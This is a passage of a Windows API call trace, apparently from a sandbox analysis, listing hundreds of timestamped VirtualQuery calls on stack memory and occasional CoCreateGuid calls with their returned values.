lpBuffer=0x24e360*(BaseAddress=0x24d000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0029.568] VirtualQuery (in: lpAddress=0x24d360, lpBuffer=0x24e360, dwLength=0x1c | out: lpBuffer=0x24e360*(BaseAddress=0x24d000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0029.568] VirtualQuery (in: lpAddress=0x24d2f8, lpBuffer=0x24e2f8, dwLength=0x1c | out: lpBuffer=0x24e2f8*(BaseAddress=0x24d000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0029.569] VirtualQuery (in: lpAddress=0x24d334, lpBuffer=0x24e334, dwLength=0x1c | out: lpBuffer=0x24e334*(BaseAddress=0x24d000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0029.569] VirtualQuery (in: lpAddress=0x24d2f8, lpBuffer=0x24e2f8, dwLength=0x1c | out: lpBuffer=0x24e2f8*(BaseAddress=0x24d000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0029.570] VirtualQuery (in: lpAddress=0x24d334, lpBuffer=0x24e334, dwLength=0x1c | out: lpBuffer=0x24e334*(BaseAddress=0x24d000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0029.570] VirtualQuery (in: lpAddress=0x24d334, lpBuffer=0x24e334, dwLength=0x1c | out: lpBuffer=0x24e334*(BaseAddress=0x24d000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0029.570] VirtualQuery (in: lpAddress=0x24d2f8, lpBuffer=0x24e2f8, dwLength=0x1c | out: lpBuffer=0x24e2f8*(BaseAddress=0x24d000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0029.570] VirtualQuery (in: lpAddress=0x24d334, lpBuffer=0x24e334, dwLength=0x1c | out: lpBuffer=0x24e334*(BaseAddress=0x24d000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0029.571] VirtualQuery (in: lpAddress=0x24d2f8, lpBuffer=0x24e2f8, dwLength=0x1c | out: lpBuffer=0x24e2f8*(BaseAddress=0x24d000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0029.571] VirtualQuery (in: lpAddress=0x24d334, lpBuffer=0x24e334, dwLength=0x1c | out: lpBuffer=0x24e334*(BaseAddress=0x24d000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0029.571] VirtualQuery (in: lpAddress=0x24d2f8, lpBuffer=0x24e2f8, dwLength=0x1c | out: lpBuffer=0x24e2f8*(BaseAddress=0x24d000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0029.572] VirtualQuery (in: lpAddress=0x24d334, lpBuffer=0x24e334, dwLength=0x1c | out: lpBuffer=0x24e334*(BaseAddress=0x24d000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0029.572] VirtualQuery (in: lpAddress=0x24d19c, lpBuffer=0x24e19c, dwLength=0x1c | out: lpBuffer=0x24e19c*(BaseAddress=0x24d000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0029.572] VirtualQuery (in: lpAddress=0x24d2f8, lpBuffer=0x24e2f8, dwLength=0x1c | out: lpBuffer=0x24e2f8*(BaseAddress=0x24d000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0029.573] VirtualQuery (in: lpAddress=0x24d334, lpBuffer=0x24e334, dwLength=0x1c | out: lpBuffer=0x24e334*(BaseAddress=0x24d000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0029.573] VirtualQuery (in: lpAddress=0x24d2f8, lpBuffer=0x24e2f8, dwLength=0x1c | out: lpBuffer=0x24e2f8*(BaseAddress=0x24d000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0029.573] VirtualQuery (in: lpAddress=0x24d334, lpBuffer=0x24e334, dwLength=0x1c | out: lpBuffer=0x24e334*(BaseAddress=0x24d000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0029.574] CoCreateGuid (in: pguid=0x24e6a8 | out: pguid=0x24e6a8*(Data1=0x284959e5, Data2=0x9aba, Data3=0x4a32, Data4=([0]=0x97, [1]=0x21, [2]=0x4e, [3]=0x10, [4]=0x26, [5]=0x1a, [6]=0x92, [7]=0x10))) returned 0x0 [0029.574] CoCreateGuid (in: pguid=0x24e6a8 | out: pguid=0x24e6a8*(Data1=0x734a3131, Data2=0x15d5, Data3=0x4251, Data4=([0]=0xb9, [1]=0xde, [2]=0x4b, [3]=0xb7, [4]=0xc7, [5]=0x39, [6]=0x3d, [7]=0x65))) returned 0x0 [0029.575] VirtualQuery (in: lpAddress=0x24cf54, lpBuffer=0x24df54, dwLength=0x1c | out: lpBuffer=0x24df54*(BaseAddress=0x24c000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0029.575] VirtualQuery (in: lpAddress=0x24cf54, lpBuffer=0x24df54, dwLength=0x1c | out: lpBuffer=0x24df54*(BaseAddress=0x24c000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0029.575] VirtualQuery (in: lpAddress=0x24cf90, lpBuffer=0x24df90, dwLength=0x1c | out: lpBuffer=0x24df90*(BaseAddress=0x24c000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0029.575] VirtualQuery (in: lpAddress=0x24cf54, lpBuffer=0x24df54, dwLength=0x1c | out: lpBuffer=0x24df54*(BaseAddress=0x24c000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0029.576] VirtualQuery (in: lpAddress=0x24cf90, lpBuffer=0x24df90, dwLength=0x1c | out: lpBuffer=0x24df90*(BaseAddress=0x24c000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0029.576] VirtualQuery (in: lpAddress=0x24cf54, lpBuffer=0x24df54, dwLength=0x1c | out: lpBuffer=0x24df54*(BaseAddress=0x24c000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0029.576] VirtualQuery (in: lpAddress=0x24cf90, lpBuffer=0x24df90, dwLength=0x1c | out: lpBuffer=0x24df90*(BaseAddress=0x24c000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0029.577] VirtualQuery (in: lpAddress=0x24cf54, lpBuffer=0x24df54, dwLength=0x1c | out: lpBuffer=0x24df54*(BaseAddress=0x24c000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0029.577] VirtualQuery (in: lpAddress=0x24cf90, lpBuffer=0x24df90, dwLength=0x1c | out: lpBuffer=0x24df90*(BaseAddress=0x24c000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0029.577] VirtualQuery (in: lpAddress=0x24cf54, lpBuffer=0x24df54, dwLength=0x1c | out: lpBuffer=0x24df54*(BaseAddress=0x24c000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0029.577] VirtualQuery (in: lpAddress=0x24cf90, lpBuffer=0x24df90, dwLength=0x1c | out: lpBuffer=0x24df90*(BaseAddress=0x24c000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0029.578] VirtualQuery (in: lpAddress=0x24cf54, lpBuffer=0x24df54, dwLength=0x1c | out: lpBuffer=0x24df54*(BaseAddress=0x24c000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0029.578] VirtualQuery (in: lpAddress=0x24cf90, lpBuffer=0x24df90, dwLength=0x1c | out: lpBuffer=0x24df90*(BaseAddress=0x24c000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0029.578] VirtualQuery (in: lpAddress=0x24d3c4, lpBuffer=0x24e3c4, dwLength=0x1c | out: lpBuffer=0x24e3c4*(BaseAddress=0x24d000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0029.579] VirtualQuery (in: lpAddress=0x24d3c4, lpBuffer=0x24e3c4, dwLength=0x1c | out: lpBuffer=0x24e3c4*(BaseAddress=0x24d000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0029.580] VirtualQuery (in: lpAddress=0x24d3c4, lpBuffer=0x24e3c4, dwLength=0x1c | out: lpBuffer=0x24e3c4*(BaseAddress=0x24d000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0029.580] VirtualQuery (in: lpAddress=0x24d3c4, lpBuffer=0x24e3c4, dwLength=0x1c | out: lpBuffer=0x24e3c4*(BaseAddress=0x24d000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0029.581] VirtualQuery (in: lpAddress=0x24cff4, lpBuffer=0x24dff4, dwLength=0x1c | out: lpBuffer=0x24dff4*(BaseAddress=0x24c000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0029.581] VirtualQuery (in: lpAddress=0x24d030, lpBuffer=0x24e030, dwLength=0x1c | out: lpBuffer=0x24e030*(BaseAddress=0x24d000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0029.581] VirtualQuery (in: lpAddress=0x24d2f8, lpBuffer=0x24e2f8, dwLength=0x1c | out: lpBuffer=0x24e2f8*(BaseAddress=0x24d000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0029.581] VirtualQuery (in: lpAddress=0x24d334, lpBuffer=0x24e334, dwLength=0x1c | out: lpBuffer=0x24e334*(BaseAddress=0x24d000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0029.582] VirtualQuery (in: lpAddress=0x24d2f8, lpBuffer=0x24e2f8, dwLength=0x1c | out: lpBuffer=0x24e2f8*(BaseAddress=0x24d000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0029.582] VirtualQuery (in: lpAddress=0x24d334, lpBuffer=0x24e334, dwLength=0x1c | out: lpBuffer=0x24e334*(BaseAddress=0x24d000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0029.582] VirtualQuery (in: lpAddress=0x24d334, lpBuffer=0x24e334, dwLength=0x1c | out: lpBuffer=0x24e334*(BaseAddress=0x24d000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0029.582] VirtualQuery (in: lpAddress=0x24d2f8, lpBuffer=0x24e2f8, dwLength=0x1c | out: lpBuffer=0x24e2f8*(BaseAddress=0x24d000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0029.582] VirtualQuery (in: lpAddress=0x24d334, lpBuffer=0x24e334, dwLength=0x1c | out: lpBuffer=0x24e334*(BaseAddress=0x24d000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0029.582] VirtualQuery (in: lpAddress=0x24d2f8, lpBuffer=0x24e2f8, dwLength=0x1c | out: lpBuffer=0x24e2f8*(BaseAddress=0x24d000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0029.583] VirtualQuery (in: lpAddress=0x24d334, lpBuffer=0x24e334, dwLength=0x1c | out: lpBuffer=0x24e334*(BaseAddress=0x24d000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0029.583] VirtualQuery (in: lpAddress=0x24d2f8, lpBuffer=0x24e2f8, dwLength=0x1c | out: lpBuffer=0x24e2f8*(BaseAddress=0x24d000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0029.583] VirtualQuery (in: lpAddress=0x24d334, lpBuffer=0x24e334, dwLength=0x1c | out: lpBuffer=0x24e334*(BaseAddress=0x24d000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0029.583] VirtualQuery (in: lpAddress=0x24d19c, lpBuffer=0x24e19c, dwLength=0x1c | out: lpBuffer=0x24e19c*(BaseAddress=0x24d000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0029.583] VirtualQuery (in: lpAddress=0x24d2f8, lpBuffer=0x24e2f8, dwLength=0x1c | out: lpBuffer=0x24e2f8*(BaseAddress=0x24d000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0029.584] VirtualQuery (in: lpAddress=0x24d334, lpBuffer=0x24e334, dwLength=0x1c | out: lpBuffer=0x24e334*(BaseAddress=0x24d000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0029.584] VirtualQuery (in: lpAddress=0x24d2f8, lpBuffer=0x24e2f8, dwLength=0x1c | out: lpBuffer=0x24e2f8*(BaseAddress=0x24d000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0029.584] VirtualQuery (in: lpAddress=0x24d334, lpBuffer=0x24e334, dwLength=0x1c | out: lpBuffer=0x24e334*(BaseAddress=0x24d000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0029.584] CoCreateGuid (in: pguid=0x24e6a8 | out: pguid=0x24e6a8*(Data1=0xa630bd80, Data2=0x90, Data3=0x4a71, Data4=([0]=0xbd, [1]=0x3b, [2]=0xcb, [3]=0x1a, [4]=0xc2, [5]=0x78, [6]=0x3d, [7]=0xf8))) returned 0x0 [0029.586] VirtualQuery (in: lpAddress=0x24cff4, lpBuffer=0x24dff4, dwLength=0x1c | out: lpBuffer=0x24dff4*(BaseAddress=0x24c000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0029.586] VirtualQuery (in: lpAddress=0x24d030, lpBuffer=0x24e030, dwLength=0x1c | out: lpBuffer=0x24e030*(BaseAddress=0x24d000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0029.586] VirtualQuery (in: lpAddress=0x24d0fc, lpBuffer=0x24e0fc, dwLength=0x1c | out: lpBuffer=0x24e0fc*(BaseAddress=0x24d000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0029.587] CoCreateGuid (in: pguid=0x24e6a8 | out: pguid=0x24e6a8*(Data1=0x22bf13bd, Data2=0x970, Data3=0x4564, Data4=([0]=0x9b, [1]=0x41, [2]=0xdf, [3]=0xbb, [4]=0xb4, [5]=0x66, [6]=0x96, [7]=0x32))) returned 0x0 [0029.587] CoCreateGuid (in: pguid=0x24e6a8 | out: pguid=0x24e6a8*(Data1=0xcef50dde, Data2=0xb4ab, Data3=0x46d6, Data4=([0]=0x92, [1]=0x3f, [2]=0xb4, [3]=0x66, [4]=0x5d, [5]=0x93, [6]=0x86, [7]=0x9c))) returned 0x0 [0029.588] CoCreateGuid (in: pguid=0x24e6a8 | out: pguid=0x24e6a8*(Data1=0x3d4dcc5f, Data2=0x9c75, Data3=0x41cd, Data4=([0]=0x8f, [1]=0x90, [2]=0xb0, [3]=0x8b, [4]=0xe9, [5]=0x34, [6]=0x2c, [7]=0xdd))) returned 0x0 [0029.588] CoCreateGuid (in: pguid=0x24e6a8 | out: pguid=0x24e6a8*(Data1=0x2330ee4e, Data2=0x37a9, Data3=0x4cae, Data4=([0]=0x91, [1]=0x12, [2]=0xbb, [3]=0x8b, [4]=0xc8, [5]=0x9a, [6]=0xd9, [7]=0xc1))) returned 0x0 [0029.588] CoCreateGuid (in: pguid=0x24e6a8 | out: pguid=0x24e6a8*(Data1=0xa667f0d4, Data2=0xf2b6, Data3=0x4035, Data4=([0]=0xbf, [1]=0x77, [2]=0x71, [3]=0x28, [4]=0x6d, [5]=0xce, [6]=0x35, [7]=0x2c))) returned 0x0 [0029.588] CoCreateGuid (in: pguid=0x24e6a8 | out: pguid=0x24e6a8*(Data1=0x42206fcb, Data2=0x5713, Data3=0x44fa, Data4=([0]=0x9a, [1]=0x1, [2]=0x76, [3]=0x53, [4]=0x4f, [5]=0x2f, [6]=0x8b, [7]=0x55))) returned 0x0 [0029.588] CoCreateGuid (in: pguid=0x24e6a8 | out: pguid=0x24e6a8*(Data1=0x5eaa6162, Data2=0xe5c9, Data3=0x4ec3, Data4=([0]=0xbd, [1]=0xbc, [2]=0x8e, [3]=0x3d, [4]=0x3a, [5]=0xb2, [6]=0x37, [7]=0xb9))) returned 0x0 [0029.589] CoCreateGuid (in: pguid=0x24e6a8 | out: pguid=0x24e6a8*(Data1=0x4ce6c398, Data2=0xc320, Data3=0x4d9f, Data4=([0]=0xa4, [1]=0x5e, [2]=0xc4, [3]=0x1f, [4]=0x61, [5]=0xed, [6]=0x32, [7]=0xcf))) returned 0x0 [0029.589] VirtualQuery (in: lpAddress=0x24cf54, lpBuffer=0x24df54, dwLength=0x1c | out: lpBuffer=0x24df54*(BaseAddress=0x24c000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0029.589] VirtualQuery (in: lpAddress=0x24cf54, lpBuffer=0x24df54, dwLength=0x1c | out: lpBuffer=0x24df54*(BaseAddress=0x24c000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0029.589] VirtualQuery (in: lpAddress=0x24cf90, lpBuffer=0x24df90, dwLength=0x1c | out: lpBuffer=0x24df90*(BaseAddress=0x24c000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0029.589] VirtualQuery (in: lpAddress=0x24cf54, lpBuffer=0x24df54, dwLength=0x1c | out: lpBuffer=0x24df54*(BaseAddress=0x24c000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0029.590] VirtualQuery (in: lpAddress=0x24cf90, lpBuffer=0x24df90, dwLength=0x1c | out: lpBuffer=0x24df90*(BaseAddress=0x24c000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0029.590] VirtualQuery (in: lpAddress=0x24cf54, lpBuffer=0x24df54, dwLength=0x1c | out: lpBuffer=0x24df54*(BaseAddress=0x24c000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0029.590] VirtualQuery (in: lpAddress=0x24cf90, lpBuffer=0x24df90, dwLength=0x1c | out: lpBuffer=0x24df90*(BaseAddress=0x24c000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0029.590] VirtualQuery (in: lpAddress=0x24cf54, lpBuffer=0x24df54, dwLength=0x1c | out: lpBuffer=0x24df54*(BaseAddress=0x24c000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0029.591] VirtualQuery (in: lpAddress=0x24cf90, lpBuffer=0x24df90, dwLength=0x1c | out: lpBuffer=0x24df90*(BaseAddress=0x24c000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0029.591] VirtualQuery (in: lpAddress=0x24cf54, lpBuffer=0x24df54, dwLength=0x1c | out: lpBuffer=0x24df54*(BaseAddress=0x24c000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0029.591] VirtualQuery (in: lpAddress=0x24cf90, lpBuffer=0x24df90, dwLength=0x1c | out: lpBuffer=0x24df90*(BaseAddress=0x24c000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0029.591] VirtualQuery (in: lpAddress=0x24cf54, lpBuffer=0x24df54, dwLength=0x1c | out: lpBuffer=0x24df54*(BaseAddress=0x24c000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0029.592] VirtualQuery (in: lpAddress=0x24cf90, lpBuffer=0x24df90, dwLength=0x1c | out: lpBuffer=0x24df90*(BaseAddress=0x24c000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0029.592] VirtualQuery (in: lpAddress=0x24d2f8, lpBuffer=0x24e2f8, dwLength=0x1c | out: lpBuffer=0x24e2f8*(BaseAddress=0x24d000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0029.592] VirtualQuery (in: lpAddress=0x24d334, lpBuffer=0x24e334, dwLength=0x1c | out: lpBuffer=0x24e334*(BaseAddress=0x24d000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0029.593] VirtualQuery (in: lpAddress=0x24d2f8, lpBuffer=0x24e2f8, dwLength=0x1c | out: lpBuffer=0x24e2f8*(BaseAddress=0x24d000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0029.593] VirtualQuery (in: lpAddress=0x24d334, lpBuffer=0x24e334, dwLength=0x1c | out: lpBuffer=0x24e334*(BaseAddress=0x24d000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0029.593] VirtualQuery (in: lpAddress=0x24d334, lpBuffer=0x24e334, dwLength=0x1c | out: lpBuffer=0x24e334*(BaseAddress=0x24d000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0029.593] VirtualQuery (in: lpAddress=0x24d2f8, lpBuffer=0x24e2f8, dwLength=0x1c | out: lpBuffer=0x24e2f8*(BaseAddress=0x24d000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0029.593] VirtualQuery (in: lpAddress=0x24d334, lpBuffer=0x24e334, dwLength=0x1c | out: lpBuffer=0x24e334*(BaseAddress=0x24d000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0029.593] CoCreateGuid (in: pguid=0x24e6a8 | out: pguid=0x24e6a8*(Data1=0x1934dffa, Data2=0x4f30, Data3=0x45aa, Data4=([0]=0xa7, [1]=0x28, [2]=0x53, [3]=0xe6, [4]=0xd7, [5]=0xd7, [6]=0x61, [7]=0x4c))) returned 0x0 [0029.593] VirtualQuery (in: lpAddress=0x24d324, lpBuffer=0x24e324, dwLength=0x1c | out: lpBuffer=0x24e324*(BaseAddress=0x24d000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0029.594] VirtualQuery (in: lpAddress=0x24d324, lpBuffer=0x24e324, dwLength=0x1c | out: lpBuffer=0x24e324*(BaseAddress=0x24d000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0029.594] VirtualQuery (in: lpAddress=0x24d360, lpBuffer=0x24e360, dwLength=0x1c | out: lpBuffer=0x24e360*(BaseAddress=0x24d000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0029.594] VirtualQuery (in: lpAddress=0x24d324, lpBuffer=0x24e324, dwLength=0x1c | out: lpBuffer=0x24e324*(BaseAddress=0x24d000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0029.594] VirtualQuery (in: lpAddress=0x24d360, lpBuffer=0x24e360, dwLength=0x1c | out: lpBuffer=0x24e360*(BaseAddress=0x24d000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0029.594] VirtualQuery (in: lpAddress=0x24d324, lpBuffer=0x24e324, dwLength=0x1c | out: lpBuffer=0x24e324*(BaseAddress=0x24d000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0029.595] VirtualQuery (in: lpAddress=0x24d360, lpBuffer=0x24e360, dwLength=0x1c | out: lpBuffer=0x24e360*(BaseAddress=0x24d000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0029.595] VirtualQuery (in: lpAddress=0x24d324, lpBuffer=0x24e324, dwLength=0x1c | out: lpBuffer=0x24e324*(BaseAddress=0x24d000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0029.595] VirtualQuery (in: lpAddress=0x24d360, lpBuffer=0x24e360, dwLength=0x1c | out: lpBuffer=0x24e360*(BaseAddress=0x24d000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0029.595] VirtualQuery (in: lpAddress=0x24d324, lpBuffer=0x24e324, dwLength=0x1c | out: lpBuffer=0x24e324*(BaseAddress=0x24d000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0029.595] VirtualQuery (in: lpAddress=0x24d360, lpBuffer=0x24e360, dwLength=0x1c | out: lpBuffer=0x24e360*(BaseAddress=0x24d000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0029.596] VirtualQuery (in: lpAddress=0x24d324, lpBuffer=0x24e324, dwLength=0x1c | out: lpBuffer=0x24e324*(BaseAddress=0x24d000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0029.596] VirtualQuery (in: lpAddress=0x24d360, lpBuffer=0x24e360, dwLength=0x1c | out: lpBuffer=0x24e360*(BaseAddress=0x24d000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, 